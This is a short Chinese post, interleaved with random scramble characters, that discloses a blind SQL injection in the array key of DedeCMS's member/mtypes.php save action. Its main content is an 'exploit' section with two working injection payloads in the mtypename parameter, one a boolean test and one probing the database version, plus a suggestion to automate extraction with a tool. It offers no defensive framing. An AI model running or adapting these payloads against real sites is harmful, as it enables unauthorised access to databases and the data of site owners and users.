) \' c; u P4 N$ A- J8 O9 x2 ]6 ?2 Y ; [0 j( n9 S9 \) V! v
发生在数组key里的注射漏洞,有点意思. ; E$ c5 ?$ ~3 b8 p/ V9 M ! d9 z9 E4 B. L5 ]$ q, W; o* }这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下0 i% R/ I8 n6 K# u) b4 N2 H
- r+ w' P: \, R6 @6 H8 ?/ Whttp://www.xxx.com /dede/member/mtypes.php?dopost=save ' M3 p8 X7 ^4 x3 h " e# r& b" N! a# }, L0 Xexploit: # W `) I6 q; B' O' @% Dmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r % @: ?0 _$ M4 N2 s5 ]" Z u, o, ?2 pmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r( d+ Z" R _0 M) E5 ~! H2 ~4 S